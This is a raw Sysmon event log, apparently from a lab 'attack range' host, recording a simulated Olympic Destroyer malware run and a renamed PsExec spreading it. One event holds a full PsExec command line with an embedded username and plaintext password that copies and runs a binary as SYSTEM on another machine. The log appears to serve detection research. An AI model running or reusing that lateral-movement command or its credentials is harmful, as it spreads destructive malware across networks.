l+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:12.536{C8EA50B7-1308-6216-1A06-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.451{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1308-6216-1B06-000000003802}3364C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.451{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1308-6216-1B06-000000003802}3364C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.436{C8EA50B7-1308-6216-1B06-000000003802}33641840C:\Windows\system32\conhost.exe{C8EA50B7-1308-6216-1A06-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.367{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1308-6216-1B06-000000003802}3364C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.367{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1308-6216-1B06-000000003802}3364C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.236{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1308-6216-1A06-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.236{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.236{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.236{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.236{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.220{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-1308-6216-1A06-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.223{C8EA50B7-1308-6216-1A06-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.12 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.220{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1308-6216-1A06-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.219{C8EA50B7-1307-6216-1806-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.198{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1307-6216-1806-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.198{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1307-6216-1806-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.198{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9101EBFFCDE78CF218B35E880322E102,SHA256=C1A614900D3E18B07A5FA91599AB98CF2EA4B58E0A07127BE4DEE271D29E4232,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000292561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:12.183{C8EA50B7-1307-6216-1806-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.120{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1308-6216-1906-000000003802}6296C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.120{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1308-6216-1906-000000003802}6296C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.098{C8EA50B7-1308-6216-1906-000000003802}62966344C:\Windows\system32\conhost.exe{C8EA50B7-1307-6216-1806-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.051{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1308-6216-1906-000000003802}6296C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:12.051{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1308-6216-1906-000000003802}6296C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217772Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:13.618{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67DB65AC79ED773691CCE1DD711D18A9,SHA256=3C79EFF57E8F6C12B7860C66609A2442F9B5DD1080BD3ADB1EAA06C78E93FB74,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.785{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1309-6216-2006-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.785{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1309-6216-2006-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:13.754{C8EA50B7-1309-6216-2006-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.723{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1309-6216-2206-000000003802}1188C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.723{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1309-6216-2206-000000003802}1188C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.720{C8EA50B7-1309-6216-2206-000000003802}11882864C:\Windows\system32\conhost.exe{C8EA50B7-1309-6216-2006-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.701{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.701{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.701{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 